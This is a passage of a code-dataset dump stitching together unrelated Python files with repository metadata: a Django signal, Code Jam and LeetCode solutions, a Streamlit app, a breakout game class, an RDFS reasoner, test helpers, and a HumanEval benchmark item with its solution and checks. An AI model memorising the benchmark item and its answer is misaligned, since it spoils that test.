        # email never references a code that gets rolled back.
        transaction.on_commit(
            lambda: code.send_user_verification_email()
        )
# Custom signal fired after a successful registration.
# NOTE(review): `providing_args` is deprecated (removed in Django 4.0) —
# keep only while the project targets an older Django.
new_registration = Signal(providing_args=["ip_address", "user_username"])
@receiver(new_registration)
def record_ip_on_new_registration(sender, **kwargs):
    """Store the registering client's IP address on the matching user.

    Expects the signal to be sent with ``user_username`` and
    ``ip_address`` keyword arguments (see ``providing_args`` above).

    Fix: the receiver previously declared a required ``task_id``
    positional parameter that the signal never provides, so every
    dispatch raised TypeError.  Receivers take ``(sender, **kwargs)``.
    """
    username = kwargs['user_username']
    ip_address = kwargs['ip_address']
    user = get_object_or_404(User, username=username)
    user.ip_address = ip_address
    user.save()
|
[
"b_easyx@protonmail.com"
] |
b_easyx@protonmail.com
|
b797535219742d7c8b142f1d14633ac6f9165b4d
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_138/1275.py
|
c8fd42dd2af78c90831cb28164d298f384b5d870
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
# Python 2 Code Jam solution: reads the input file named on the command line.
import os, sys
import itertools
lines = [line.strip() for line in open("%s" % sys.argv[1]).readlines()]
# Reversed so lines.pop() yields the file top-down.
lines.reverse()
cases = lines.pop()
for case in range(int(cases)):
	lines.pop()
	lowers, highers = [], []
	N = sorted(map(float,lines.pop().split(' ')))
	K = sorted(map(float,lines.pop().split(' ')))
	# Greedy matching: for each n, pick the largest unused K below/above it.
	for i, n in enumerate(N):
		try:
			lower = max(filter(lambda x: x<n and x not in lowers, K))
			lowers.append(lower)
		except:
			lower = None
		try:
			higher = max(filter(lambda x: x>n and x not in highers, K))
			highers.append(higher)
		except:
			higher = None
	# Trailing commas keep all three prints on one output line (Python 2).
	print "Case #%s:" % (case+1),
	print len(lowers),
	# Second answer: pair each n with the smallest remaining k > n (or the
	# overall minimum when none is larger) and count wins n > k.
	print len(filter(lambda x: x[0] >x[1], [(n,K.pop(K.index(min(filter(lambda x: x>n, K) or K)))) for n in N]))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
fc717f0194925a31c30c22421f8fd0d344685fb7
|
14a6662a1b0a6d113dfb724382e3a7e2735bbbac
|
/Aula04/src/app.py
|
a75434ebdf760bdece64d6668611e4858a65f6f3
|
[] |
no_license
|
Karagul/streamlit_bootcamp
|
c118c01d9bec354eaabb504c9fd1d59dc5c63c93
|
48fa703ce7a2d4ac003fe881220cb66d926f17ca
|
refs/heads/main
| 2023-02-08T20:57:31.280465
| 2021-01-05T14:36:35
| 2021-01-05T14:36:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,387
|
py
|
import streamlit as st
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def carrega_dados(caminho):
    """Load the CSV file at `caminho` into a pandas DataFrame."""
    return pd.read_csv(caminho)
def grafico_comparativo(dados_2019, dados_2020, causa, estado="BRASIL"):
    """Build a 2019-vs-2020 bar plot of deaths for one cause.

    dados_2019 / dados_2020: DataFrames with at least the columns
    'tipo_doenca' (cause) and 'uf' (state) plus numeric death counts.
    causa: cause-of-death label to compare.
    estado: two-letter state code, or "BRASIL" for the national total.
    Returns the seaborn/matplotlib Axes of the bar plot.
    """
    if estado == "BRASIL":
        # National total: aggregate over every state.
        total_2019 = dados_2019.groupby("tipo_doenca").sum()
        total_2020 = dados_2020.groupby("tipo_doenca").sum()
        lista = [int(total_2019.loc[causa]), int(total_2020.loc[causa])]
    else:
        # Per-state totals: group by (state, cause) and index both levels.
        total_2019 = dados_2019.groupby(["uf", "tipo_doenca"]).sum()
        total_2020 = dados_2020.groupby(["uf", "tipo_doenca"]).sum()
        lista = [int(total_2019.loc[estado, causa]),
                 int(total_2020.loc[estado, causa])]
    dados = pd.DataFrame({"Total": lista,
                          "Ano": [2019, 2020]})
    #plt.figure(figsize=(8, 6))
    return sns.barplot(x="Ano", y="Total", data=dados)
    #plt.title(f"Óbitos por {causa} - {estado}")
    # plt.show()
def main():
    """Streamlit entry point: load both years' data and render the page."""
    obitos_2019 = carrega_dados("dados/obitos-2019.csv")
    obitos_2020 = carrega_dados("dados/obitos-2020.csv")
    # SRAG = severe acute respiratory syndrome (Portuguese acronym).
    figura = grafico_comparativo(obitos_2019, obitos_2020,
                                 "SRAG")
    st.title("Análise de Óbitos 2019-2020")
    st.markdown("Este trabalho analisa dados dos **óbitos 2019-2020**")
    # grafico_comparativo returns an Axes; st.pyplot renders its figure.
    st.pyplot(figura)
if __name__ == "__main__":
    main()
|
[
"noreply@github.com"
] |
Karagul.noreply@github.com
|
5e7bfbedc16acf4ca6372e3a2381661d385fbfa6
|
092894284a5c5f29ff7d9323b854eb6781c64fab
|
/Res/Prefabs/GameObjects/player/ball.py
|
d9a59ff63f5dc80128a7526049375b631cd7da2a
|
[] |
no_license
|
sourenaKhanzadeh/breakoutgame
|
4660809ceae23b7b1bf587cc1bd6f94141f3c16f
|
87ee5933c6dde22f74ee22e5f40d016a4a4b22e9
|
refs/heads/master
| 2020-05-22T07:17:27.345601
| 2019-05-29T21:25:21
| 2019-05-29T21:25:21
| 186,262,103
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,387
|
py
|
from Prefabs.GameObjects.shapes.shapes import *
from Prefabs.GameObjects.bricks.bricks import Brick
from setting import *
class Ball(Circle):
    """The breakout ball: a circle that bounces off walls and bricks.

    Velocity components `self.dx`/`self.dy` are presumably provided by the
    Circle base class (not visible here) — TODO confirm.
    """
    def __init__(self, x=WIDTH // 2, y=WIDTH // 2, color=CC.RED, width=0, rad=10):
        # Defaults place the ball at screen centre with a 10px radius.
        super().__init__(x, y, color, width, rad)
    def move(self):
        """Advance the ball one frame, bouncing off the side/top edges."""
        # Reverse horizontal direction at the right edge...
        if self.getX() + self.getRad() + self.dx > WIDTH:
            self.dx = -self.dx
        # ...or at the left edge.
        elif self.getX() - (self.getRad() - self.dx) < 0:
            self.dx = -self.dx
        # NOTE(review): this triggers only when the ball is fully above the
        # top edge (y + rad < 0) — confirm that is the intended top bounce.
        if self.getY() + self.getRad() < 0:
            self.dy = -self.dy
        # Optional wrap-around behaviour controlled by the DEBUG setting.
        self.debug(DEBUG)
        # Apply velocity: x grows east, y decreases upward via decY.
        self.incX(self.dx)
        self.decY(self.dy)
    def debug(self, active):
        """When active, wrap the ball back to the top once it leaves the bottom."""
        if active:
            if self.getY() > HEIGHT:
                self.setY(0)
    def collision(self, col:Shape):
        """Bounce vertically off `col` and damage it if it is a brick."""
        # Very simple collision: the ball's previous y must line up with the
        # shape's top while x overlaps the shape horizontally.
        if self.getY() - self.dy == col.getY() and \
            col.getX() <= self.getX() <= col.getX() + col.getW():
            self.dy = -self.dy
            # len() doubles as a type tag here (see __len__ below).
            if len(col) == OO.BRICKS:
                col.hits -= 1
    def __len__(self):
        # Type tag used by collision dispatch, not a real length.
        return OO.BALL
|
[
"soure@DESKTOP-6PVNFEF.(none)"
] |
soure@DESKTOP-6PVNFEF.(none)
|
09275b427690ef44e7430628700f07f44cb8824f
|
627b050148e767be12cfc7dfa81b1c6368cf3104
|
/LeetCode/Apr20Challenge/Week4/day28_first_unique_number.py
|
dbac91abe928bd0387b8a926467a0d6759e87d98
|
[] |
no_license
|
imn00133/algorithm
|
6ce5d10491bde853eb9e4d6a69bde3124723875c
|
40d7bbe6e3cfe932122c32a9f730f951e948ef2d
|
refs/heads/master
| 2022-08-13T20:26:06.200622
| 2022-07-31T08:54:26
| 2022-07-31T08:54:26
| 231,281,731
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,776
|
py
|
#
# Solved Date: 20.04.28.
import collections
class FirstUnique:
    """Queue tracking the first value that occurs exactly once (LC 1429).

    Keeps a count per value, a FIFO of candidate unique values, and a
    cached answer in `self.unique` (None when every value repeats).
    """

    def __init__(self, nums):
        self.unique = None
        self.next_unique_queue = collections.deque()
        self.manage_unique = collections.defaultdict(int)
        for value in nums:
            self.manage_unique[value] += 1
            # First sighting: the value becomes a uniqueness candidate.
            if self.manage_unique[value] == 1:
                self.next_unique_queue.append(value)
        self.find_next_unique()

    def show_first_unique(self) -> int:
        """Return the first unique value, or -1 when none exists."""
        return -1 if self.unique is None else self.unique

    def add(self, value) -> None:
        """Add `value` and refresh the cached answer when it may be stale."""
        self.manage_unique[value] += 1
        if self.manage_unique[value] == 1:
            self.next_unique_queue.append(value)
        # Stale when we just duplicated the current answer, or when there
        # was no unique value before this add.
        current = self.show_first_unique()
        if value == current or current == -1:
            self.find_next_unique()

    def find_next_unique(self):
        """Advance the candidate queue to the next still-unique value."""
        while self.next_unique_queue:
            candidate = self.next_unique_queue.popleft()
            if self.manage_unique[candidate] == 1:
                self.unique = candidate
                return
        self.unique = None
def test():
    """Manual driver exercising FirstUnique with three scenarios."""
    queue = FirstUnique([2, 3, 5])
    print(queue.show_first_unique())   # expected: 2
    queue.add(5)
    print(queue.show_first_unique())   # expected: 2 (5 duplicated, 2 untouched)
    queue.add(2)
    print(queue.show_first_unique())   # expected: 3 (2 now duplicated)
    queue.add(3)
    print(queue.show_first_unique())   # expected: -1 (all values repeat)
    print()
    queue = FirstUnique([7, 7, 7])
    print(queue.show_first_unique())   # expected: -1
    queue.add(7)
    queue.add(3)
    queue.add(3)
    queue.add(7)
    queue.add(17)
    print(queue.show_first_unique())   # expected: 17 (only value seen once)
    print()
    queue = FirstUnique([809])
    print(queue.show_first_unique())   # expected: 809
    queue.add(809)
    print(queue.show_first_unique())   # expected: -1
if __name__ == '__main__':
test()
|
[
"imn00133@gmail.com"
] |
imn00133@gmail.com
|
a669bc69cb66d9ef0348342ab4523d913845ef3c
|
ca3a49676cdf1016b2d729f0432b451d35b7a281
|
/human_eval/51b1be3f-d417-418d-9236-bf203e68cd76.py
|
68a5863b1201739cd1b33a0edc4579baab2e15f8
|
[
"MIT"
] |
permissive
|
SquareandCompass/code-align-evals-data
|
3bb71b605316f56bb27466f23706a329f3fb4938
|
97446d992c3785d6605f1500b2c9b95d042e7b9c
|
refs/heads/main
| 2023-06-19T12:47:56.277363
| 2021-07-21T00:22:56
| 2021-07-21T00:22:56
| 640,147,842
| 0
| 1
| null | 2023-05-13T06:22:30
| 2023-05-13T06:22:29
| null |
UTF-8
|
Python
| false
| false
| 1,269
|
py
|
ENTRY_POINT = 'check_if_last_char_is_a_letter'
#[PROMPT]
def check_if_last_char_is_a_letter(txt):
    '''
    Create a function that returns True if the last character
    of a given string is an alphabetical character and is not
    a part of a word, and False otherwise.
    Note: "word" is a group of characters separated by space.
    Examples:
    check_if_last_char_is_a_letter("apple pie") ➞ False
    check_if_last_char_is_a_letter("apple pi e") ➞ True
    check_if_last_char_is_a_letter("apple pi e ") ➞ False
    check_if_last_char_is_a_letter("") ➞ False
    '''
#[SOLUTION]
    # The last space-separated token must be a single ASCII letter.
    last_token = txt.split(' ')[-1]
    if len(last_token) != 1:
        return False
    return 97 <= ord(last_token.lower()) <= 122
#[CHECK]
def check(candidate):
    # Table-driven version of the hand-written assertions:
    # each pair is (input, expected result), checked in order.
    cases = [
        ("apple", False),
        ("apple pi e", True),
        ("eeeee", False),
        ("A", True),
        ("Pumpkin pie ", False),
        ("Pumpkin pie 1", False),
        ("", False),
        ("eeeee e ", False),
        ("apple pie", False),
        ("apple pi e ", False),
    ]
    for text, expected in cases:
        assert candidate(text) == expected
    # Trivially-true edge-case placeholder kept from the original.
    assert True
|
[
"barnes@openai.com"
] |
barnes@openai.com
|
a1e485a39c453c99a40f6f2d40cad085fe060fb2
|
c7a6f8ed434c86b4cdae9c6144b9dd557e594f78
|
/ECE364/.PyCharm40/system/python_stubs/348993582/nss/nss/RDN.py
|
0e53aeab1e6b2f125e445f912c8e9778bbce5a23
|
[] |
no_license
|
ArbalestV/Purdue-Coursework
|
75d979bbe72106975812b1d46b7d854e16e8e15e
|
ee7f86145edb41c17aefcd442fa42353a9e1b5d1
|
refs/heads/master
| 2020-08-29T05:27:52.342264
| 2018-04-03T17:59:01
| 2018-04-03T17:59:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,870
|
py
|
# encoding: utf-8
# module nss.nss
# from /usr/lib64/python2.6/site-packages/nss/nss.so
# by generator 1.136
""" This module implements the NSS functions """
# no imports
from object import object
class RDN(object):
    """Stub of nss.nss.RDN — an X501 Relative Distinguished Name.

    An RDN is an ordered collection of `AVA` objects supporting both
    sequence access (index, slice, len, iteration) and mapping access by
    canonical attribute name (e.g. 'cn') or dotted-decimal OID
    (e.g. '2.5.4.3').  Mapping lookups always return a *list*, because an
    RDN may hold several AVAs of the same type
    (e.g. OU=engineering+OU=boston).

    Constructor forms: ``RDN()``, ``RDN(nss.AVA('cn', 'www.redhat.com'))``,
    ``RDN([ava0, ava1])`` — zero or more AVAs, or a list/tuple of AVAs.

    Auto-generated IDE stub: the bodies below are placeholders mirroring
    the signatures of the C extension in nss.so.
    """
    def has_key(self, arg):  # real signature unknown; restored from __doc__
        """has_key(arg) -> bool

        arg may be a canonical name (e.g. 'cn'), a dotted-decimal OID
        string, or a SEC_OID_* enumeration constant.  Returns True when
        the RDN has an AVA whose oid can be identified by arg.
        """
        return False
    def __cmp__(self, y):  # real signature unknown; restored from __doc__
        """ x.__cmp__(y) <==> cmp(x,y) """
        pass
    def __getitem__(self, y):  # real signature unknown; restored from __doc__
        """ x.__getitem__(y) <==> x[y] """
        pass
    def __init__(self):  # real signature unknown; restored from __doc__
        pass
    def __len__(self):  # real signature unknown; restored from __doc__
        """ x.__len__() <==> len(x) """
        pass
    @staticmethod  # known case of __new__
    def __new__(S, *more):  # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    def __repr__(self):  # real signature unknown; restored from __doc__
        """ x.__repr__() <==> repr(x) """
        pass
|
[
"pkalita@princeton.edu"
] |
pkalita@princeton.edu
|
67a8e024e53d7041f7109406e394418a30cabb10
|
6bd9d7679011042f46104d97080786423ae58879
|
/1690/c/c.py
|
05a66b00321f18a9b1c0841c33b880eda782958a
|
[
"CC-BY-4.0"
] |
permissive
|
lucifer1004/codeforces
|
20b77bdd707a1e04bc5b1230f5feb4452d5f4c78
|
d1fe331d98d6d379723939db287a499dff24c519
|
refs/heads/master
| 2023-04-28T16:00:37.673566
| 2023-04-17T03:40:27
| 2023-04-17T03:40:27
| 212,258,015
| 3
| 1
| null | 2020-10-27T06:54:02
| 2019-10-02T04:53:36
|
C++
|
UTF-8
|
Python
| false
| false
| 471
|
py
|
from sys import stdin
# Fast stdin helpers for competitive programming.
def input(): return stdin.readline().strip()
def read_int():
    return int(input())
def read_ints():
    return map(int, input().split())
# Codeforces 1690C: tasks run back-to-back; a task's effective start is
# the later of its scheduled start s[i] and the previous finish f[i-1].
t = read_int()
for case_num in range(t):
    n = read_int()
    s = list(read_ints())
    f = list(read_ints())
    d = []
    for i in range(n):
        if i == 0 or s[i] >= f[i - 1]:
            # No queueing: the task actually starts at s[i].
            d.append(f[i] - s[i])
        else:
            # Queued behind the previous task: starts at f[i-1].
            d.append(f[i] - f[i - 1])
    print(' '.join(map(str, d)))
|
[
"qqbbnease1004@126.com"
] |
qqbbnease1004@126.com
|
b1db52e476e7f1ade39cda5d0191f6c042142711
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/classvs_20200630154634.py
|
8a7e8665bf8b3e3c22a42c56688dd4c01f2f0c85
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
class Person:
    """Simple person model tracking an age (HackerRank Day 4 kata)."""

    age = 0  # class-level default; __init__ always sets an instance value

    def __init__(self,initialAge):
        """Store initialAge, clamping invalid (non-positive) ages to 0."""
        if initialAge > 0:
            self.age = initialAge
        else:
            self.age = 0
            print("Age is not valid, setting age to 0.. ")

    def yearPasses(self):
        """Advance the age by one year and return the new age."""
        self.age = self.age +1
        return self.age

    def amOld(self):
        """Print the age bracket: young (<13), teenager (13-17), old (18+)."""
        # Fix: the brackets were two independent `if` statements, so any
        # age < 13 also fell into the else branch and printed *both*
        # "You are young.." and "You are old..".  `elif` makes the three
        # brackets mutually exclusive.
        if self.age < 13:
            print("You are young..")
        elif self.age >= 13 and self.age < 18:
            print("You are a teenager..")
        else:
            print("You are old..")
# Demo: create a 10-year-old, age them one year, then print their bracket.
person = Person(10)
person.yearPasses()  # age becomes 11
person.amOld()
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
ed2fdb1bb003f7c36e88a99e59dff4ea2d85a2af
|
42ea9b76bfbf4d609f655d897082fb3f46bf4058
|
/src/minimalkb/services/simple_rdfs_reasoner.py
|
f9a108d6c2e04bd7809837b58efbe8129461d309
|
[
"BSD-3-Clause"
] |
permissive
|
chili-epfl/minimalkb
|
a9ffe957caa8fd24645117e7afbc97b7406c3048
|
25d90d90dc9e8dbf41ba18bf522a80eeb6520dbb
|
refs/heads/master
| 2021-05-20T17:37:52.403932
| 2021-02-25T09:30:09
| 2021-02-25T09:30:09
| 13,498,236
| 4
| 1
|
BSD-3-Clause
| 2021-02-25T02:39:50
| 2013-10-11T12:21:29
|
Python
|
UTF-8
|
Python
| false
| false
| 7,032
|
py
|
import logging; logger = logging.getLogger("minimalKB."+__name__);
DEBUG_LEVEL=logging.DEBUG
import time
import datetime
import sqlite3
from minimalkb.backends.sqlite import sqlhash
from minimalkb.kb import DEFAULT_MODEL
REASONER_RATE = 5 #Hz
class OntoClass:
    """Node in the in-memory class taxonomy.

    Holds the class name plus the sets of parent classes, child classes,
    direct instances, and owl:equivalentClass partners discovered so far.
    """

    def __init__(self, name):
        self.name = name
        self.parents = set()
        self.children = set()
        self.instances = set()
        self.equivalents = set()

    def __repr__(self):
        parts = [
            self.name,
            "\n\tParents: " + str(self.parents),
            "\n\tChildren: " + str(self.children),
            "\n\tInstances: " + str(self.instances),
        ]
        return "".join(parts)
class SQLiteSimpleRDFSReasoner:
SYMMETRIC_PREDICATES = {"owl:differentFrom", "owl:sameAs", "owl:disjointWith"}
    def __init__(self, database = "kb.db"):
        """Open a private in-memory triple store mirroring `database`.

        Copies the schema of the shared on-disk `triples` table into the
        in-memory database so classification can run without locking the
        shared store.
        """
        self.db = sqlite3.connect(':memory:') # create a memory database
        self.shareddb = sqlite3.connect(database)
        # create the tables
        # taken from http://stackoverflow.com/questions/4019081
        # iterdump() yields full SQL statements; we keep the first one that
        # mentions "triples" (its CREATE TABLE statement).
        # NOTE(review): if the shared db has no "triples" table, `query`
        # stays None and executescript() below will fail — confirm callers
        # always pass an initialized database.
        query = None
        for line in self.shareddb.iterdump():
            if "triples" in line:
                query = line
                break
        self.db.executescript(query)
        self.running = True
        logger.info("Reasoner (simple RDFS) started. Classification running at %sHz" % REASONER_RATE)
####################################################################
####################################################################
def classify(self):
starttime = time.time()
self.copydb()
models = self.get_models()
newstmts = []
for model in models:
rdftype, subclassof = self.get_missing_taxonomy_stmts(model)
newstmts += [(i, "rdf:type", c, model) for i,c in rdftype]
newstmts += [(cc, "rdfs:subClassOf", cp, model) for cc,cp in subclassof]
newstmts += self.symmetric_statements(model)
if newstmts:
logger.debug("Reasoner added new statements to the knowledge base:\n -" +\
"\n - ".join(["%s %s %s (in %s)" % stmt for stmt in newstmts]))
self.update_shared_db(newstmts)
logger.info("Classification took %fsec." % (time.time() - starttime))
def get_models(self):
with self.db:
return [row[0] for row in self.db.execute("SELECT DISTINCT model FROM triples")]
def get_onto(self, db, model = DEFAULT_MODEL):
onto = {}
rdftype = None
subclassof = None
equivalentclasses = None
with db:
rdftype = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='rdf:type' AND model=?)
''', [model])}
subclassof = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='rdfs:subClassOf' AND model=?)
''', [model])}
equivalentclasses = {(row[0], row[1]) for row in db.execute(
'''SELECT subject, object FROM triples
WHERE (predicate='owl:equivalentClass' AND model=?)
''', [model])}
for cc, cp in subclassof:
parent = onto.setdefault(cp, OntoClass(cp))
child = onto.setdefault(cc, OntoClass(cc))
child.parents.add(parent)
parent.children.add(child)
for i, c in rdftype:
onto.setdefault(c, OntoClass(c)).instances.add(i)
for ec1, ec2 in equivalentclasses:
equi1 = onto.setdefault(ec1, OntoClass(ec1))
equi2 = onto.setdefault(ec2, OntoClass(ec2))
equi1.equivalents.add(equi2)
equi2.equivalents.add(equi1)
return onto, rdftype, subclassof
def get_missing_taxonomy_stmts(self, model = DEFAULT_MODEL):
onto, rdftype, subclassof = self.get_onto(self.db, model)
newrdftype = set()
newsubclassof = set()
def addinstance(instance, cls):
newrdftype.add((instance, cls.name))
for p in cls.parents:
addinstance(instance, p)
def addsubclassof(scls, cls):
newsubclassof.add((scls.name, cls.name))
for p in cls.parents:
addsubclassof(scls, p)
for name, cls in onto.items():
for i in cls.instances:
addinstance(i, cls)
for p in cls.parents:
addsubclassof(cls, p)
for equivalent in cls.equivalents:
for i in cls.instances:
addinstance(i, equivalent)
for p in cls.parents:
addsubclassof(equivalent, p)
newrdftype -= rdftype
newsubclassof -= subclassof
return newrdftype, newsubclassof
def symmetric_statements(self, model):
with self.db:
stmts = {(row[0], row[1], row[2], model) for row in self.db.execute(
'''SELECT subject, predicate, object FROM triples
WHERE (predicate IN ('%s') AND model=?)
''' % "', '".join(self.SYMMETRIC_PREDICATES), [model])}
return {(o, p, s, m) for s, p, o, m in stmts} - stmts # so we keep only the new symmetrical statements
######################################################################
######################################################################
def copydb(self):
""" Tried several other options (with ATTACH DATABASE -> that would likely lock the shared database as well, with iterdump, we miss the 'OR IGNORE')
"""
res = self.shareddb.execute("SELECT * FROM triples")
with self.db:
self.db.execute("DELETE FROM triples")
self.db.executemany('''INSERT INTO triples
VALUES (?, ?, ?, ?, ?, ?, ?, ?)''',
res)
def update_shared_db(self, stmts):
logger.debug("Reasoner added %s new statements: %s" % (len(stmts), stmts))
timestamp = datetime.datetime.now().isoformat()
stmts = [[sqlhash(s,p,o,model), s, p, o, model, timestamp] for s,p,o,model in stmts]
with self.shareddb:
self.shareddb.executemany('''INSERT OR IGNORE INTO triples
(hash, subject, predicate, object, model, timestamp, inferred)
VALUES (?, ?, ?, ?, ?, ?, 1)''', stmts)
def __call__(self, *args):
try:
while self.running:
time.sleep(1./REASONER_RATE)
self.classify()
except KeyboardInterrupt:
return
# module-level singleton; created lazily by start_reasoner()
reasoner = None

def start_reasoner(db):
    """Create (once) and run the global RDFS reasoner against *db*.

    Blocks the calling thread until the reasoner loop exits.

    :param db: path to the shared SQLite database file.
    """
    global reasoner
    if not reasoner:
        # BUG FIX: the `db` argument was previously ignored and the reasoner
        # always opened the default 'kb.db'.
        reasoner = SQLiteSimpleRDFSReasoner(db)
    reasoner.running = True
    reasoner()

def stop_reasoner():
    """Signal the running reasoner loop (if any) to stop after its next tick."""
    if reasoner:
        reasoner.running = False
|
[
"severin.lemaignan@epfl.ch"
] |
severin.lemaignan@epfl.ch
|
ca558fb7c1542d8a31c2201706ddd1b15d043e8c
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/series/4b461e5da45242b5971e42844d148b42.py
|
99ea386f4fc3f7410b9f7ea347e65477581b406a
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 583
|
py
|
def slices(digits, length_of_series):
    """Return every consecutive run of *length_of_series* digits.

    :param digits: a string (or sequence) of decimal digit characters.
    :param length_of_series: length of each slice; must satisfy
        1 <= length_of_series <= len(digits).
    :returns: list of lists of ints, one per consecutive window.
    :raises ValueError: if the requested length is out of range.
    """
    # reject impossible window sizes up front (same conditions as before)
    if length_of_series > len(digits) or length_of_series < 1:
        raise ValueError
    values = [int(d) for d in digits]
    # one slice per valid start index — replaces the previous O(n^2)
    # loop that repeatedly copied and pop(0)'d a mutable list
    return [values[start:start + length_of_series]
            for start in range(len(values) - length_of_series + 1)]
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
f12654076d1f91eff74e060ecf6c9c3b0487d989
|
ac216a2cc36f91625e440247986ead2cd8cce350
|
/appengine/predator/analysis/analysis_testcase.py
|
2c001a931cc3aba51f1d550a485ba1f8e897dd97
|
[
"BSD-3-Clause"
] |
permissive
|
xinghun61/infra
|
b77cdc566d9a63c5d97f9e30e8d589982b1678ab
|
b5d4783f99461438ca9e6a477535617fadab6ba3
|
refs/heads/master
| 2023-01-12T21:36:49.360274
| 2019-10-01T18:09:22
| 2019-10-01T18:09:22
| 212,168,656
| 2
| 1
|
BSD-3-Clause
| 2023-01-07T10:18:03
| 2019-10-01T18:22:44
|
Python
|
UTF-8
|
Python
| false
| false
| 5,668
|
py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import copy
from libs.base_testcase import BaseTestCase
from libs.gitiles.change_log import ChangeLog
from analysis.type_enums import CrashClient
# Canonical fake commit shared by analysis tests; GetDummyChangeLog() hands
# out deep copies so individual tests may mutate theirs safely.
DUMMY_CHANGELOG = ChangeLog.FromDict({
    'author': {
        'name': 'r@chromium.org',
        'email': 'r@chromium.org',
        'time': 'Thu Mar 31 21:24:43 2016',
    },
    'committer': {
        'name': 'example@chromium.org',
        'email': 'r@chromium.org',
        'time': 'Thu Mar 31 21:28:39 2016',
    },
    'message': 'dummy',
    'commit_position': 175900,
    # one added file and one renamed file, covering both change types
    'touched_files': [
        {
            'change_type': 'add',
            'new_path': 'a.cc',
            'old_path': None,
        },
        {
            'change_type': 'rename',
            'old_path': 'old_name.cc',
            'new_path': 'new_name.cc',
        },
    ],
    'commit_url':
        'https://repo.test/+/1',
    'code_review_url': 'https://codereview.chromium.org/3281',
    'revision': '1',
    'reverted_revision': None
})
class MockLog(object):  # pragma: no cover
    """In-memory stand-in for a logger: records every call for later inspection."""

    def __init__(self):
        self.logs = []

    def Log(self, name, message, level):
        entry = {'name': name, 'message': message, 'level': level}
        self.logs.append(entry)
class AnalysisTestCase(BaseTestCase):  # pragma: no cover.
    """Shared helpers for Predator analysis tests.

    Provides deep-equality checks for stack traces and factory methods that
    build dummy crash-report payloads for the Clusterfuzz and Chrome-crash
    clients.
    """

    def _VerifyTwoStackFramesEqual(self, frame1, frame2):
        # frames must both exist, stringify identically, and share dep_path
        self.assertIsNotNone(frame1, "the first frame is unexpectedly missing")
        self.assertIsNotNone(frame2, "the second frame is unexpectedly missing")
        self.assertEqual(str(frame1), str(frame2))
        self.assertEqual(frame1.dep_path, frame2.dep_path)

    def _VerifyTwoCallStacksEqual(self, stack1, stack2):
        # compare stack metadata, then frames pairwise
        self.assertIsNotNone(stack1, "the first stack is unexpectedly missing")
        self.assertIsNotNone(stack2, "the second stack is unexpectedly missing")
        self.assertEqual(len(stack1.frames), len(stack2.frames))
        self.assertEqual(stack1.priority, stack2.priority)
        self.assertEqual(stack1.format_type, stack2.format_type)
        self.assertEqual(stack1.language_type, stack2.language_type)
        # NOTE(review): under Python 3 `map` is lazy, so this per-frame check
        # never actually executes — wrap in list() or loop if ported off Py2.
        map(self._VerifyTwoStackFramesEqual, stack1.frames, stack2.frames)

    def _VerifyTwoStacktracesEqual(self, trace1, trace2):
        self.assertIsNotNone(trace1, "the first trace is unexpectedly missing")
        self.assertIsNotNone(trace2, "the second trace is unexpectedly missing")
        self.assertEqual(len(trace1.stacks), len(trace2.stacks))
        # NOTE(review): same Python-3 lazy-`map` caveat as above.
        map(self._VerifyTwoCallStacksEqual, trace1.stacks, trace2.stacks)

    def GetDummyChangeLog(self):
        """Return a private, mutable copy of the canonical dummy commit."""
        return copy.deepcopy(DUMMY_CHANGELOG)

    def GetDummyClusterfuzzData(
            self, client_id=CrashClient.CLUSTERFUZZ, version='1',
            signature='signature', platform='win', stack_trace=None,
            regression_range=None, testcase_id='213412343',
            crash_type='check', crash_address='0x0023',
            job_type='android_asan', sanitizer='ASAN', dependencies=None,
            dependency_rolls=None, redo=False, security_flag=False):
        """Build a Clusterfuzz-style crash_data dict; every field overridable."""
        crash_identifiers = {'testcase_id': testcase_id}
        regression_range = regression_range or {
            'dep_path': 'src',
            'repo_url': 'https://chromium.git',
            'old_revision': '3',
            'new_revision': '9',
        }
        customized_data = {
            'crash_type': crash_type,
            'crash_address': crash_address,
            'job_type': job_type,
            'sanitizer': sanitizer,
            'regression_range': regression_range,
            'dependencies': dependencies or [{'dep_path': 'src/',
                                              'repo_url': 'https://repo',
                                              'revision': 'rev'}],
            'dependency_rolls': dependency_rolls or [{'dep_path': 'src/',
                                                      'repo_url': 'https://repo',
                                                      'old_revision': 'rev1',
                                                      'new_revision': 'rev5'}],
            'testcase_id': testcase_id,
